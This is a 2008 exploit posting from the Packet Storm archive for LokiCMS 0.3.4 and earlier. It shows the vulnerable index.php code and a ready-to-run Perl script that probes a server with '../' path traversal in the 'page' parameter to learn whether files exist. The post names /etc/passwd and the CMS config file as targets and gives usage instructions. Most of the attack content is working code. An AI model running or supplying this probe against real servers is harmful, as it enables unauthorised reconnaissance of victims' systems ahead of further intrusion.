exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

lokicms-check.txt

lokicms-check.txt
Posted Oct 13, 2008
Authored by JosS | Site spanish-hackers.com

Loki CMS versions 0.3.4 and below arbitrary check file exploit that uses index.php.

tags | exploit, arbitrary, php
SHA-256 | be67f43384df6c25801eed843addc07a10d6839ec99575f2f587cb95fb6e88a4

lokicms-check.txt

Change Mirror Download
# LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit
# url: http://www.lokicms.com/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website

vulnerability:
The vulnerability allows to verify the existence of the files and directories around the server.
/etc/passwd (example)

vuln file: index.php
vuln code:
------------------------------------------------
if ( isset ( $_GET ) && isset ( $_GET['page'] ) ) $pagename = stripslashes ( trim ( $_GET['page'] ) );



// load the page

if ($pagename == '') {

$name = $c_default;

$nosimple = true;

} else {

$name = $pagename;

};



if ($c_simplelink == true && $nosimple != true) {

$content = findpage($name);

if ($content == "") {$content = $c_default;};

} else {

$content = $name;

};



// stupid fix due to subdomain problems

if ($c_modrewrite != true && $pagename != '') {if (file_exists(PATH . "/pages/" . $content) == false) {$content = $c_default;};};



// load the menu

$menu = getmenu($content, $c_modrewrite, $c_simplelink);



$content = parsepage($content);
------------------------------------------------

use strict;
use LWP::UserAgent;

sub lw
{

my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
}

}

&lw;

print "#################################################################\n";
print "# LokiCMS 0.3.4 (index.php page) Arbitrary Check File Exploit #\n";
print "#################################################################\n";

my $victim = $ARGV[0];
my $file = $ARGV[1];

if((!$ARGV[0]) && (!$ARGV[1])) {
print "\n[x] LokiCMS 0.3.4 (index.php page) Arbitrary Check File Exploit\n";
print "[x] written by JosS - sys-project[at]hotmail.com\n";
print "[x] usage: perl xpl.pl [host] [file]\n";
print "[x] example: http://localhost/loki/ /includes/Config.php\n\n";
exit(1);
}

print "\n[+] connecting: $victim\n";
my $cnx = LWP::UserAgent->new() or die;
my $go=$cnx->get($victim."index.php?page=../$file");
if ($go->content =~ m/LokiCMS/ms) {
print "[-] The file not exist\n\n";
} else {
print "[!] The file exist: $file\n\n";
}

# live demo: http://demo.opensourcecms.com/lokicms/

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close